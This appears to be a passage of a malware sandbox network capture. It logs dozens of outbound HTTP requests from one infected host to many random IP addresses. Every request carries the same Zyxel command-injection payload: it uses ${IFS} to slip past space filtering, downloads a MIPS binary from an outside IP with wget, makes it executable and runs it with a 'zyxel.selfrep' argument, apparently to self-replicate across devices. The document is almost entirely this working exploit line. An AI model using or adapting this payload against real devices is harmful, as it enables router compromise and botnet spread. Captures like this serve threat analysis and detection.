                                                Jan 12, 2024 18:24:24.563302994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1463192.168.2.1346940178.57.162.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563361883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1464192.168.2.134227469.231.152.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563378096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1465192.168.2.1343580120.225.55.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563415051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1466192.168.2.1345936211.173.248.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563473940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1467192.168.2.1351532150.192.34.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563488960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1468192.168.2.1358956199.224.184.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563539028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1469192.168.2.133932669.68.40.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563595057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1470192.168.2.133704077.190.120.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563621044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1471192.168.2.135486840.93.204.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563657045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1472192.168.2.133804032.89.128.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563714027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1473192.168.2.134081017.81.188.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563755989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1474192.168.2.1341670210.54.5.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563796997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1475192.168.2.135757298.119.165.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563851118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1476192.168.2.133700065.190.200.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563878059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1477192.168.2.1345266107.169.150.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563908100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1478192.168.2.135044683.2.179.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.563958883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1479192.168.2.1337148143.219.6.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564007044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1480192.168.2.134096678.33.212.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564049006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1481192.168.2.133596819.109.13.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564090967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1482192.168.2.133712875.100.183.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564126015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1483192.168.2.1360056202.237.206.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564160109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1484192.168.2.1356340200.125.222.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564191103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1485192.168.2.134556270.209.165.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564239025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1486192.168.2.133469042.145.110.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564277887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1487192.168.2.1354584125.203.218.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564311028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1488192.168.2.134077844.88.160.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564352036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1489192.168.2.133580696.220.150.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564388990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1490192.168.2.13391222.229.70.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564435959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1491192.168.2.1354410213.136.199.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564480066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1492192.168.2.134618685.219.66.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564522028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1493192.168.2.134686642.7.214.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564567089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1494192.168.2.1351702102.94.119.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564605951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1495192.168.2.1355238149.184.75.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564618111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1496192.168.2.1332800115.255.53.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564668894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1497192.168.2.134137038.159.134.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564688921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1498192.168.2.135848479.9.120.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564747095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1499192.168.2.13490061.94.42.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564788103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1500192.168.2.135205627.214.76.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564809084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1501192.168.2.1351568107.144.187.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564872026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1502192.168.2.1359950201.208.100.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564903975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1503192.168.2.1351554143.156.170.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564949989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1504192.168.2.1333274119.188.140.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.564979076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1505192.168.2.1338420201.57.211.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565012932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1506192.168.2.1344774206.71.237.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565047979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1507192.168.2.1360944134.253.207.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565079927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1508192.168.2.1344412120.90.130.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565131903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1509192.168.2.1348400183.235.44.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565140009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1510192.168.2.1335292114.184.80.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565193892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1511192.168.2.1337380206.18.167.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565227032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1512192.168.2.134663242.73.163.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565257072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1513192.168.2.1347940186.53.65.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565290928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1514192.168.2.1342954200.55.230.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565330982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1515192.168.2.1336870191.140.165.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565377951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1516192.168.2.133977868.126.104.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565418005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1517192.168.2.1333678124.76.199.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565468073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1518192.168.2.135448434.190.61.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565495014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1519192.168.2.134363886.188.100.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565546989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1520192.168.2.134409863.91.207.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565579891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1521192.168.2.1339916104.19.240.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565614939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1522192.168.2.135001041.64.27.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565650940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1523192.168.2.1351960209.31.192.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565721989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1524192.168.2.133343461.114.50.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:24.565731049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1525192.168.2.1347124204.230.52.205443
                                                TimestampBytes transferredDirectionData
